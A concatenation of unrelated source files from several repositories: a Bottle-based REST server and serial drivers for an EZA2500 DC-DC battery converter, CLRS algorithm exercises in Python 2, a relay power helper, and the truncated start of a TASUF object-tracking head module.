if _local_current_mode == '0x0000':
self.run(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.run(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
self.run(self.com0104, {
'mode': self.checkOperationMode_2500(essx_util.hexStrToInt(params['mode']))
})
else:
self.run(self.com0104, {
'mode': self.checkOperationMode_2500(essx_util.hexStrToInt(params['mode']))
})
self.run(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.run(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
##########################################↑↑↑######################################################
###################################################################################################
self.run(self.com0201)
self.run(self.com0901)
self.run(self.com1001)
res = {}
res["operationMode"] = self.com0104.response['mode']
res["alarmState"] = (self.com0201.response['cst'] & 0xc) >> 2
res["alarm"] = (self.com0901.response['alm1'])
res["status"] = (self.com0201.response['cst'] & 0x3)
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'], 16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
res["dvg"] = round(self.com0404.response['dvg'], 16)
res["drg"] = round(self.com0404.response['drg'], 16)
res["dig"] = round(self.com0604.response['dig'], 16)
return {
"status": {
"status": "0x" + ('%04x' % res["operationMode"]),
"alarmState": essx_util.alarmStateStr(res["alarmState"]),
"statusName": "Ignore",
"alarm": essx_util.alarmStr(res["status"], res["alarmState"], res["alarm"]),
"runningState": essx_util.runningStateStr(res['status']),
"operationMode": essx_util.operationModeStr(res["operationMode"]),
},
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
"vdis": {
"dvg": res["dvg"],
"drg": res["drg"]
},
"param": {
'cib': _conf['cib'],
'ubv': _conf['ubv'],
"dig": res["dig"],
'ogv': _conf['ogv'],
'obv': _conf['obv'],
'ugv': _conf['ugv'],
}
}
def remote_set_current(self, params):
"""
dig is required.
mode, dvg and drg are also passed down from the upper layer but are not required.
"""
_conf = self.dcdc_config['config']
self.vrfy(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
self.run(self.com0604, {
'ubv': _conf['ubv'],
'ugv': _conf['ugv'],
'obv': _conf['obv'],
'ogv': _conf['ogv'],
'cib': _conf['cib'],
'dig': params['dig'],
})
self.run(self.com1001)
res = {}
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'], 16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
res["dig"] = round(self.com0604.response['dig'], 16)
return {
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
"param": {
'cib': _conf['cib'],
'ubv': _conf['ubv'],
"dig": res["dig"],
'ogv': _conf['ogv'],
'obv': _conf['obv'],
'ugv': _conf['ugv'],
}
}
def remote_set_voltage(self, params):
"""
dvg and drg are required.
mode and dig are also passed down from the upper layer but are not required.
"""
self.vrfy(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.run(self.com0404, {
'dvg': params['dvg'], 'drg': params['drg']
})
self.run(self.com1001)
res = {}
res["wg"] = round(self.com1001.response['wg'], 16)
res["tmp"] = round(self.com1001.response['tmp'], 16)
res["vb"] = round(self.com1001.response['vb'], 16)
res["wb"] = round(self.com1001.response['wb'], 16)
res["vg"] = round(self.com1001.response['vg'], 16)
res["ib"] = round(self.com1001.response['ib'], 16)
res["ig"] = round(self.com1001.response['ig'], 16)
res["dvg"] = round(self.com0404.response['dvg'], 16)
res["drg"] = round(self.com0404.response['drg'], 16)
return {
"meter": {
"wg": res["wg"],
"tmp": res["tmp"],
"vb": res["vb"],
"wb": res["wb"],
"vg": res["vg"],
"ib": res["ib"],
"ig": res["ig"]
},
"vdis": {
"dvg": res["dvg"],
"drg": res["drg"]
},
}
def remote_ioctl_clr_alarm(self, params):
self.run(self.com0904, {
'd0': 0, 'd1': 0,
})
return self.remote_get(params)
def checkOperationMode_2500(self, v):
"""
Validate an operationMode value for the EZA2500.
"""
if v == 0x0:
return v
elif v == 0x2:
return v
elif v == 0x14:
return v
elif v == 0x41:
return v
raise ESSXValueException("bad value: operation mode: " + str(v))
if __name__ == "__main__":
# For a standalone test, a device must be connected at the far end (esscomm/ess2/test.py can stand in for it)
import serial
import traceback
import essx
ser_dev = essx.essx_rs232c.ESSXRS232C("/dev/cuaU1", 19200)
dcdc_dev = eza2500.EZA2500Device(dev = ser_dev, timeout = 1)
controller = ESSXTypeOES(dcdc_dev = dcdc_dev, bat_dev = None, dcdc_config = {
'config': {
'bcf': 0,
# 'lbc': 45.8, # battery current limit (charge)
# 'lbd': 45.8, # battery current limit (discharge)
'ubv': 60, # battery undervoltage threshold
'obv': 60, # battery overvoltage threshold
#'lgc': 34.4, # grid current limit (charge)
#'lgd': 34.4, # grid current limit (discharge)
'ugv': 280, # grid undervoltage threshold
'ogv': 280, # grid overvoltage threshold
#'tgv': 240, # grid target voltage
'cvb': 40, # battery target voltage
'dlb': 40, # battery end-of-discharge voltage
'cdb': 6, # battery charge upper-limit warning voltage deviation
'ddb': 6, # battery end-of-charge warning voltage deviation
#'drg': 0.25, # grid droop rate
'drb': 0.25, # battery droop rate
'cib': 45.8,
}}, bat_config = {
'config': {
'battery_voltage': 200,
'battery_current': 2.0
}}
)
try:
print("/1/log/data")
print(controller.log_data({}))
print("remote/ioctl/get")
print(controller.remote_ioctl_get({}))
print("remote/ioctl/set")
print(controller.remote_ioctl_set({}))
print(controller.remote_get({}))
print(controller.remote_get_status({}))
print(controller.remote_set({'mode': '0x02', 'dvg': 300, 'drg': 0.1, 'dig': 0}))
print(controller.remote_set_current({'dig': 3}))
print(controller.remote_set_voltage({'dvg': 360, 'drg': 0.2}))
print(controller.remote_ioctl_clr_alarm({}))
except ESSXValueException as err:
print(err.reason)
print(traceback.format_exc())
raise err
```
#### File: apis-dcdc_batt_comm/drivers/essx_server.py
```python
import sys
import os
import bottle
from bottle import route, HTTPResponse
import argparse
import serial
import essx
from essx.essx_exception import ESSXException, ESSXConfigException, ESSXParameterException
from essx.essx_modbus import ESSXModbusClient
from essx.essx_rs485 import ESSXRS485
import yaml
from decimal import Decimal
import datetime
import json
parser = argparse.ArgumentParser(description = 'ESS Server')
parser.add_argument('--host', default = "localhost")
parser.add_argument('--port', default = 8080, type = int)
parser.add_argument('--debug', action = 'store_true')
parser.add_argument('--goodbye', action = 'store_true')
parser.add_argument('--config', default = "dcdc_batt_comm.yml")
args = parser.parse_args()
if args.debug == True:
os.environ['ESSX_LOG_LEVEL'] = '7'
class ESSXConfig(object):
"""
Manages the configuration file. This class is a singleton.
"""
_instance = None
def __new__(cls, config_file, *args, **kwargs):
if not cls._instance:
cls._instance = super(ESSXConfig, cls).__new__(cls, *args, **kwargs)
return cls._instance
def __init__(self, config_file, *args, **kwargs):
super(ESSXConfig, self).__init__(*args, **kwargs)
self.config_file = config_file
self.reload()
def reload(self):
f = open(self.config_file)
self._config = yaml.safe_load(f)
f.close()
def config(self):
return self._config
def __getitem__(self, i):
return self._config[i]
def init_controller(dcdc_unit = 0, battery_unit = 0):
"""
Initialize and return the controller according to the configuration file.
@param dcdc_unit DCDC unit number
@param battery_unit Battery unit number
"""
ess_system_config = app_config['ess_system']
if ess_system_config['type'] == 'essx_type_oes':
import essx.essx_type_oes
import eza2500
import battery_emulator
dcdc_config = ess_system_config['dcdc_dev'][dcdc_unit]
bat_config = ess_system_config['battery_dev'][battery_unit]
if dcdc_config['class'] == 'ESSXRS485':
dcdc_dev_params = dcdc_config['params']
dcdc_dev_kwparams = dcdc_config['kwparams']
ser_dev = essx.essx_rs485.ESSXRS485(*dcdc_dev_params, **dcdc_dev_kwparams)
dcdc_dev = eza2500.EZA2500Device(dev = ser_dev, timeout = 0.1)
else:
raise ESSXConfigException('dcdc_config')
if bat_config['class'] == 'ESSXModbus':
bat_dev_params = bat_config.get('params', [])
if 'kwparams' in bat_config:
bat_dev_kwparams = bat_config['kwparams']
else:
bat_dev_kwparams = {}
dev = essx.essx_modbus.ESSXModbusClient(*bat_dev_params, **bat_dev_kwparams)
bat_dev = battery_emulator.BatteryEmulator(dev = dev, modbus_adr_rsoc = bat_config['modbus_adr_rsoc'] - 30001, modbus_adr_status = bat_config['modbus_adr_status'] - 30001, unit = bat_config['unit'])
elif bat_config['class'] == 'None':
bat_dev = None
else:
raise ESSXConfigException('bat_config')
dcdc_config_name = dcdc_config['config']
bat_config_name = bat_config['config']
controller = essx.essx_type_oes.ESSXTypeOES(
dcdc_dev = dcdc_dev,
bat_dev = bat_dev,
dcdc_config = app_config['dcdc'][dcdc_config_name],
bat_config = app_config['battery'][bat_config_name],
ad1 = int(dcdc_config['address1']),
ad2 = int(dcdc_config['address2']),
name = dcdc_config['name'],
)
else:
print("unknown controller: " + ess_system_config['type'])
sys.exit(0)
return controller
def essx_exception_handler(func):
""" essx_exceptionが発生したときの例外デコレーター """
import functools
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
res = func(*args, **kwargs)
return res
except ESSXException as err:
body = {'err': err.reason}
res = HTTPResponse(status=400, body=body)
res.set_header('Content-Type', 'application/json')
return res
except Exception as err:
body = {'err': str(err)}
res = HTTPResponse(status=400, body=body)
res.set_header('Content-Type', 'application/json')
return res
return wrapper
@route('/essx/hello')
@essx_exception_handler
def hello():
""" デバッグ用 """
body = {'message': 'hello world'}
r = HTTPResponse(status=200, body=body)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.reset(0)
return r
@route('/essx/goodbye')
@essx_exception_handler
def goodbye():
""" デバッグ用 """
if args.goodbye:
body = {'message': 'goodbye'}
r = HTTPResponse(status=200, body=body)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.reset(0)
print("GOODBYE!")
os._exit(0)
@route('/battery/get')
@route('/1/log/data')
@essx_exception_handler
def cmd_get_1_log_data():
res = controller.log_data({})
if bottle.request.fullpath == '/battery/get':
res = {'rsoc': res['rsoc'], 'battery_operation_status': res['battery_operation_status']}
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/dcdc/get')
@route('/remote/get')
@essx_exception_handler
def cmd_get_remote_get():
res = controller.remote_get({})
if bottle.request.fullpath == '/dcdc/get':
del res['powermeter']
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/dcdc/get/status')
@route('/remote/get/status')
@essx_exception_handler
def cmd_get_remote_get_status():
res = controller.remote_get_status({})
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
_global_current_mode = '0x0000' #############Added for v1.3 2018/11/14##########################
@route('/dcdc/set')
@route('/remote/set')
@essx_exception_handler
def cmd_get_remote_set():
# mode, dvg and dig are required parameters.
# When omitted they are taken from the cached values.
# When drg is not given the cached value is used; if there is no cached value either, it falls back to 0.
params = {}
req_params = bottle.request.params
if bottle.request.fullpath == '/dcdc/set':
# v1.2 added /dcdc/set as an API equivalent to /remote/set, /remote/set/voltage and
# /remote/set/current, but those three APIs return slightly different JSON data, so
# this code treats /dcdc/set with only dig as /remote/set/current, and /dcdc/set with
# only dvg (or only dvg and drg) as /remote/set/voltage.
if 'dig' in req_params and not 'dvg' in req_params and not 'drg' in req_params and not 'mode' in req_params:
return cmd_remote_set_current()
if not 'dig' in req_params and 'dvg' in req_params and not 'mode' in req_params:
return cmd_remote_set_voltage()
if 'mode' in req_params:
params['mode'] = req_params['mode']
elif essx.ESSXGlobal.has(0, 'mode'):
params['mode'] = essx.ESSXGlobal.get(0, 'mode')
else:
raise ESSXParameterException("No operationMode")
if 'dig' in req_params:
params['dig'] = req_params['dig']
elif essx.ESSXGlobal.has(0, 'dig'):
params['dig'] = essx.ESSXGlobal.get(0, 'dig')
else:
raise ESSXParameterException("No dig")
if 'dvg' in req_params:
params['dvg'] = req_params['dvg']
elif essx.ESSXGlobal.has(0, 'dvg'):
params['dvg'] = essx.ESSXGlobal.get(0, 'dvg')
else:
raise ESSXParameterException("No dvg")
if 'drg' in req_params:
params['drg'] = req_params['drg']
elif essx.ESSXGlobal.has(0, 'drg'):
params['drg'] = essx.ESSXGlobal.get(0, 'drg')
else:
params['drg'] = 0
global _global_current_mode #############Added for v1.3 2018/11/14###########################
params['current_mode'] = _global_current_mode #############Added for v1.3 2018/11/14###########################
res = controller.remote_set(params)
_global_current_mode = res['status']['operationMode'] #############Added for v1.3 2018/11/14###########################
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.put(0, 'mode', params['mode'])
essx.ESSXGlobal.put(0, 'dig', params['dig'])
essx.ESSXGlobal.put(0, 'dvg', params['dvg'])
essx.ESSXGlobal.put(0, 'drg', params['drg'])
return r
@route('/remote/set/current')
@essx_exception_handler
def cmd_remote_set_current():
params = {}
req_params = bottle.request.params
# mode is required by the lower layer but cannot be specified here
if essx.ESSXGlobal.has(0, 'mode'):
params['mode'] = essx.ESSXGlobal.get(0, 'mode')
else:
raise ESSXParameterException("No operationMode")
# dig is required (although the spec could also be read as making it optional)
if 'dig' in req_params:
params['dig'] = req_params['dig']
# elif essx.ESSXGlobal.has(0, 'dig'):
# params['dig'] = essx.ESSXGlobal.get(0, 'dig')
else:
raise ESSXParameterException("No dig")
# dvg is required by the lower layer but cannot be specified here
if essx.ESSXGlobal.has(0, 'dvg'):
params['dvg'] = essx.ESSXGlobal.get(0, 'dvg')
else:
raise ESSXParameterException("No dvg")
# drg is needed by the lower layer but cannot be specified here
if essx.ESSXGlobal.has(0, 'drg'):
params['drg'] = essx.ESSXGlobal.get(0, 'drg')
else:
params['drg'] = 0
res = controller.remote_set_current(params)
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.put(0, 'dig', params['dig'])
return r
@route('/remote/set/voltage')
@essx_exception_handler
def cmd_remote_set_voltage():
params = {}
req_params = bottle.request.params
# mode is needed by the lower layer but cannot be specified here
if essx.ESSXGlobal.has(0, 'mode'):
params['mode'] = essx.ESSXGlobal.get(0, 'mode')
else:
raise ESSXParameterException("No operationMode")
# dig is needed by the lower layer but cannot be specified here
if essx.ESSXGlobal.has(0, 'dig'):
params['dig'] = essx.ESSXGlobal.get(0, 'dig')
else:
raise ESSXParameterException("No dig")
# dvg is required (although the spec could also be read as making it optional)
if 'dvg' in req_params:
params['dvg'] = req_params['dvg']
# elif essx.ESSXGlobal.has(0, 'dvg'):
# params['dvg'] = essx.ESSXGlobal.get(0, 'dvg')
else:
raise ESSXParameterException("No dvg")
# drg is needed by the lower layer; it falls back to 0 when absent.
if 'drg' in req_params:
params['drg'] = req_params['drg']
elif essx.ESSXGlobal.has(0, 'drg'):
params['drg'] = essx.ESSXGlobal.get(0, 'drg')
else:
params['drg'] = 0
res = controller.remote_set_voltage(params)
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.put(0, 'dvg', params['dvg'])
essx.ESSXGlobal.put(0, 'drg', params['drg'])
return r
@route('/remote/ioctl/set')
@essx_exception_handler
def cmd_remote_ioctl_set():
app_config.reload()
dcdc_unit =0
battery_unit = 0
ess_system_config = app_config['ess_system']
dcdc_config = ess_system_config['dcdc_dev'][dcdc_unit]
bat_config = ess_system_config['battery_dev'][battery_unit]
dcdc_config_name = dcdc_config['config']
bat_config_name = bat_config['config']
controller.dcdc_config = app_config['dcdc'][dcdc_config_name]
controller.bat_config = app_config['battery'][bat_config_name]
params = {}
res = controller.remote_ioctl_set(params)
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/all/get')
@route('/remote/ioctl/get')
@essx_exception_handler
def cmd_remote_ioctl_get():
params = {}
res = controller.remote_ioctl_get(params)
if bottle.request.fullpath == '/all/get':
res = {
'rsoc': res['rsoc'],
'battery_operation_status': res['battery_operation_status'],
'meter': res['meter'],
'param': res['param'],
'status': res['status'],
'vdis': res['vdis']
}
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/remote/ioctl/clr_alarm')
@essx_exception_handler
def cmd_remote_ioctl_clr_alarm():
params = {}
res = controller.remote_ioctl_clr_alarm(params)
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/version/get')
@essx_exception_handler
def cmd_version_get():
res = {
"comm_interface_version": "2.0",
"dcdc_batt_comm_version": "1.4"
}
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
app_config = ESSXConfig(args.config)
controller = init_controller()
class MyJSONPlugin(bottle.JSONPlugin):
def __init__(self):
super().__init__()
self.plain_dump = self.json_dumps
self.json_dumps = lambda body: self.plain_dump(body, default=self.convert)
def convert(self, obj):
if isinstance(obj, Decimal):
return float(obj)
elif isinstance(obj, datetime.datetime):
return obj.isoformat()
else:
raise TypeError('{} is not JSON serializable'.format(repr(obj)))
bottle.install(MyJSONPlugin())
bottle.run(host = "0.0.0.0", port = args.port, debug = args.debug)
```
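A minimal client-side sketch of the REST interface wired up above; the `requests` package and a locally running server on the default port 8080 are assumptions, everything else mirrors the routes defined in this file.
```python
# Hypothetical client; assumes the server above runs on localhost:8080 and that
# the third-party `requests` package is installed.
import requests

BASE = 'http://localhost:8080'

print(requests.get(BASE + '/version/get').json())
print(requests.get(BASE + '/dcdc/get/status').json())

# The first /remote/set call must carry mode, dvg and dig (drg falls back to 0);
# later calls may omit them and the cached ESSXGlobal values are reused.
r = requests.get(BASE + '/remote/set',
                 params={'mode': '0x02', 'dvg': 380, 'drg': 0.2, 'dig': 3.0})
print(r.json()['status']['operationMode'])
```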
#### File: drivers/eza2500/command1101.py
```python
from struct import pack, unpack
import os
from essx import essx_debug
from essx.essx_exception import ESSXDeviceException, ESSXValueException, ESSXParameterException, ESSXException
from eza2500 import eza2500_base
from eza2500 import eza2500_util
class Command1101(eza2500_base.EZA2500CommandBase):
""" EZA2500 11-1 """
COMMAND = 10
CMD_LEN = 0
ACK_LEN = 16
NAK_LEN = 2
def __init__(self, device):
super(Command1101, self).__init__(device)
self.response = {}
def pack_senddata(self, ad1, ad2, params = {}):
req = pack("<BBBBB", 0x05 ,self.CMD_LEN ,ad1 ,ad2 ,10) + b"00"
return eza2500_util.replace_check_sum(req)
def send(self, ad1, ad2, params = {}):
send_data = self.pack_senddata(ad1, ad2, params)
essx_debug.log('send')
essx_debug.dump(send_data)
self.device.write(send_data)
return send_data
def recv(self):
essx_debug.log('recv')
recv_data = self._recv()
self.response_raw = recv_data
res = {}
(_sfd, _len, _ad1, _ad2, _cmd) = unpack("BBBBB", recv_data[0:5])
if _cmd == 0x0a: #ACK
(_ts ,_tp ,_v5s ,_fan1 ,_fan2 ,_fan3 ,_fan4 ,_fan5 ,_chksum) = unpack("<hhhhhhhhH", recv_data[5:])
_v5s = eza2500_util.q_denormalize(_v5s, 10, '1', 'None', 'None', 'v5s')
_fan1 = eza2500_util.q_denormalize(_fan1, 0, '1', 'None', 'None', 'fan1')
_fan2 = eza2500_util.q_denormalize(_fan2, 0, '1', 'None', 'None', 'fan2')
_fan3 = eza2500_util.q_denormalize(_fan3, 0, '1', 'None', 'None', 'fan3')
_fan4 = eza2500_util.q_denormalize(_fan4, 0, '1', 'None', 'None', 'fan4')
_fan5 = eza2500_util.q_denormalize(_fan5, 0, '1', 'None', 'None', 'fan5')
res["ts"] = _ts
res["tp"] = _tp
res["v5s"] = _v5s
res["fan1"] = _fan1
res["fan2"] = _fan2
res["fan3"] = _fan3
res["fan4"] = _fan4
res["fan5"] = _fan5
res["chksum"] = _chksum
self.response = res
elif _cmd == 0x8a: #NAK
(_ercd ,_chksum) = unpack("<HH", recv_data[5:])
res["ercd"] = _ercd
res["chksum"] = _chksum
self.response = res
raise ESSXDeviceException("error: ERCD=%x" % _ercd)
else:
raise ESSXValueException("bad response")
self.response = res
essx_debug.log('recv')
#essx_debug.dump(recv_data)
return recv_data
@classmethod
def unit_test(cls, dev = None, params = None):
from io import BytesIO
class Dummy:
def __init__(self):
_ts = 0
_tp = 0
_v5s = 0.0
_v5s = int(eza2500_util.q_normalize(_v5s, 10, '1', 'None', 'None', 'v5s'))
_fan1 = 0.0
_fan1 = int(eza2500_util.q_normalize(_fan1, 0, '1', 'None', 'None', 'fan1'))
_fan2 = 0.0
_fan2 = int(eza2500_util.q_normalize(_fan2, 0, '1', 'None', 'None', 'fan2'))
_fan3 = 0.0
_fan3 = int(eza2500_util.q_normalize(_fan3, 0, '1', 'None', 'None', 'fan3'))
_fan4 = 0.0
_fan4 = int(eza2500_util.q_normalize(_fan4, 0, '1', 'None', 'None', 'fan4'))
_fan5 = 0.0
_fan5 = int(eza2500_util.q_normalize(_fan5, 0, '1', 'None', 'None', 'fan5'))
_chksum = 0
data = pack("<BBBBBhhhhhhhhH", 2, Command1101.ACK_LEN, 1, 2, 0x0a, _ts ,_tp ,_v5s ,_fan1 ,_fan2 ,_fan3 ,_fan4 ,_fan5 ,_chksum)
_chksum = eza2500_util.calc_check_sum(data)
self.reader = BytesIO(data[:-2] + pack('BB', _chksum % 256, _chksum // 256))
def read(self, bytes):
return self.reader.read(bytes)
def write(self, data):
essx_debug.dump(data)
if dev == None:
dev = Dummy()
cmd = Command1101(dev)
if params == None:
params = {}
cmd.send(1, 2, params)
cmd.recv()
# To run this as a standalone test, add the parent directory to PYTHONPATH
if __name__ == "__main__":
import sys
#import serial
import essx
from eza2500_device import EZA2500Device
if len(sys.argv) > 1 and sys.argv[1] == '1':
ser_dev = essx.essx_rs232c.ESSXRS232C('/dev/cuaU1', 115200)
dev = EZA2500Device(dev = ser_dev, timeout = 1)
else:
dev = None
try:
Command1101.unit_test(dev)
except ESSXException as err:
print(err.reason)
raise err
```
#### File: drivers/eza2500/eza2500_device.py
```python
import datetime
import serial
import time
import os
from essx.essx_exception import *
from essx import essx_debug
from eza2500 import eza_device
class EZA2500Device(eza_device.EZADevice):
"""
Communicates with the EZA2500.
@param dev communication device; must implement read / write
@param timeout timeout in seconds; read / write raises ESSXTimeoutException once this time has elapsed
"""
def __init__(self, dev = None, timeout = None):
self.ser = dev #
self.ser.timeout = 0.01
self.timeout = timeout
# To run this as a standalone test, add the parent directory to PYTHONPATH
if __name__ == "__main__":
from struct import *
from io import BytesIO
class DummySerial(object):
def __init__(self):
self.reader = BytesIO(b"ABCDEFG")
self.writer = BytesIO()
def read(self, size):
ret = self.reader.read(size)
return ret
def write(self, data):
essx_debug.dump(data)
self.writer.write(data)
return len(data)
#ser_dev = serial.Serial("/dev/cuaU1", 115200, timeout = 0.01)
eza2500_dev = EZA2500Device(dev = DummySerial(), timeout = 1)
wdata = pack("<BBBBBH", 5, 0, 0x31, 0x32, 0, 0x31 + 0x32)
eza2500_dev.write(wdata)
print('201 ok')
essx_debug.dump(eza2500_dev.read(7)) #=> no timeout
print('202 ok')
try:
essx_debug.dump(eza2500_dev.read(7)) #=> timeout
raise ESSXFatalException("fatal")
except ESSXTimeoutException as e:
print('203 ok')
``` |
{
"source": "jinurajan/CLRS",
"score": 4
} |
#### File: CLRS/chapter_2/2.3-7_find_integers_with_k_sum.py
```python
def merge(A, p, q, r):
n1 = q - p + 1
n2 = r - q
L = [0] * n1
R = [0] * n2
for i in range(0, n1):
L[i] = A[p + i]
for j in range(0, n2):
R[j] = A[q + 1 + j]
i, j = 0, 0
k = p
while i < n1 and j < n2:
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
k += 1
while i < n1:
A[k] = L[i]
i += 1
k += 1
while j < n2:
A[k] = R[j]
j += 1
k += 1
def mergesort(A, p, r):
if p < r:
q = (p + (r - 1)) // 2
mergesort(A, p, q)
mergesort(A, q + 1, r)
merge(A, p, q, r)
return A
def bin_search(arr, l, r, x):
if l <= r:
mid = (l + r) // 2
if arr[mid] == x:
return True
if arr[mid] > x:
return bin_search(arr, l, mid-1, x)
return bin_search(arr, mid+1, r, x)
return False
def bin_search_1(arr, l, r, x):
if l <= r:
mid = (l + r) // 2
if arr[mid] == x:
return mid
if arr[mid] > x:
return bin_search_1(arr, l, mid-1, x)
return bin_search_1(arr, mid+1, r, x)
return -1
def pair_exists(s, x):
"""
1. sort using merge sort: O(n log n)
2. for each element, binary search for its complement: O(log n) per lookup
total = O(n log n) + n * O(log n) == O(n log n)
"""
if not s:
return False
l = len(s)
s = mergesort(s, 0, l - 1) # takes O(nlogn)
for i in range(l):
# caveat: when x - s[i] == s[i], bin_search can match the element with itself (e.g. x = 8 and a single 4 in s)
if bin_search(s, 0, l - 1, x - s[i]):
return True
return False
def pair_exists_1(s, x):
"""
1. sort using merge sort: O(n log n)
2. use the two-pointer method: move the right pointer left while the sum is > x and
the left pointer right while it is < x, until the pointers meet
"""
if not s:
return False
n = len(s)
s = mergesort(s, 0, n - 1) # takes O(nlogn)
l = 0
r = n-1
while l <= r:
if s[l] + s[r] == x:
return True
elif s[l] + s[r] > x:
r -= 1
else:
l += 1
return False
def pair_exists_2(s, x):
"""
1. sort using merge sort: O(n log n)
2. for each element, binary search for its complement: O(log n) per lookup
total = O(n log n) + n * O(log n) == O(n log n)
"""
if not s:
return False
l = len(s)
s = mergesort(s, 0, l - 1) # takes O(nlogn)
for i in range(l):
# unlike pair_exists, reject a hit that is the element itself (bin_search_1 may return i when x - s[i] == s[i])
search_val = bin_search_1(s, 0, l - 1, x - s[i])
if search_val != -1 and search_val != i:
return True
return False
print pair_exists([3, 4, 6, 2, 7], 9)
print pair_exists([3, 4, 6, 2, 7], 15)
print pair_exists_1([3, 4, 6, 2, 7], 9)
print pair_exists_1([3, 4, 6, 2, 7], 15)
print pair_exists_2([3, 4, 6, 2, 7], 9)
print pair_exists_2([3, 4, 4, 2, 7], 8)
print pair_exists_2([3, 4, 6, 2, 7], 15)
```
#### File: CLRS/chapter_2/2_n_bit_binary_sum.py
```python
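# Adds two n-bit binary numbers A and B (lists of 0/1 bits, most significant bit
# first) into an (n+1)-element result list C. binSum returns 10 (decimal) to
# represent the two-bit binary result "10", i.e. a carry.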
def binSum(a, b):
if a == 1 and b == 1:
return 10
elif a == 0 and b == 0:
return 0
else:
return 1
def nbitsum(A, B):
if len(A) != len(B):
# invalid case
return
c = [0] * (len(A) + 1)
c_n = len(A)
rem = 0
n = len(A) - 1
while n >= 0:
val = binSum(A[n], B[n])
if val == 10:
if not rem:
val = 0
rem = 1
else:
val = 1
rem = 1
else:
if rem:
val = binSum(val, rem)
# adding the carry can itself overflow: 1 + carry -> 0 with the carry kept,
# 0 + carry -> 1 with the carry cleared
if val == 10:
val = 0
else:
rem = 0
c[c_n] = val
c_n -= 1
n -= 1
if rem:
c[c_n] = rem
return c
if __name__ == "__main__":
A = [1, 1, 1]
B = [1, 1, 1]
print nbitsum(A, B)
A = [1, 0, 0]
B = [1, 1, 0]
print nbitsum(A, B)
```
#### File: CLRS/chapter_2/3_selection_sort.py
```python
def selection_sort(array):
n = len(array)
for i in range(n):
min_index = i
for j in range(i + 1, n):
if array[j] <= array[min_index]:
min_index = j
array[i], array[min_index] = array[min_index], array[i]
return array
def selection_sort_descending(array):
n = len(array)
for i in range(n):
max_index = i
for j in range(i + 1, n):
if array[j] >= array[max_index]:
max_index = j
array[i], array[max_index] = array[max_index], array[i]
return array
print selection_sort([6, 5, 4, 3, 2, 1])
print selection_sort_descending([1, 2, 3, 4, 5, 6])
``` |
{
"source": "jinuskr/jinuspi",
"score": 2
} |
#### File: jinuskr/jinuspi/console.py
```python
from relay_switch import Power
power = Power(channel=4)
def power_on():
power.on()
def power_off():
power.off()
``` |
{
"source": "jinw0o0/TASUF",
"score": 3
} |
#### File: models/track_heads/track_head_tasuf.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from mmdet.core import (delta2bbox, multiclass_nms, bbox_target,
weighted_cross_entropy, weighted_smoothl1, accuracy)
from ..registry import HEADS
@HEADS.register_module
class TrackHeadTASUF(nn.Module):
"""Tracking head, predict tracking features and match with reference objects
Use dynamic option to deal with different number of objects in different
images. A non-match entry is added to the reference objects with all-zero
features. Object matched with the non-match entry is considered as a new
object.
"""
def __init__(self,
with_avg_pool=False,
num_fcs = 2,
in_channels=256,
roi_feat_size=7,
fc_out_channels=1024,
match_coeff=None,
bbox_dummy_iou=0,
dynamic=True
):
super(TrackHeadTASUF, self).__init__()
self.in_channels = in_channels
self.with_avg_pool = with_avg_pool
self.roi_feat_size = roi_feat_size
self.match_coeff = match_coeff
self.bbox_dummy_iou = bbox_dummy_iou
self.num_fcs = num_fcs
if self.with_avg_pool:
self.avg_pool = nn.AvgPool2d(roi_feat_size)
else:
in_channels *= (self.roi_feat_size * self.roi_feat_size)
# LSTM:
# There was no empirical exploration on 'input_size', 'hidden_size' and 'num_layers'.
self.lstm = nn.LSTM(input_size=1024, hidden_size=1024,
num_layers=2, batch_first=False)
# Convert ROI feature map of (7 x 7 x 256) to input vector for LSTM.
self.in_fcs = nn.ModuleList()
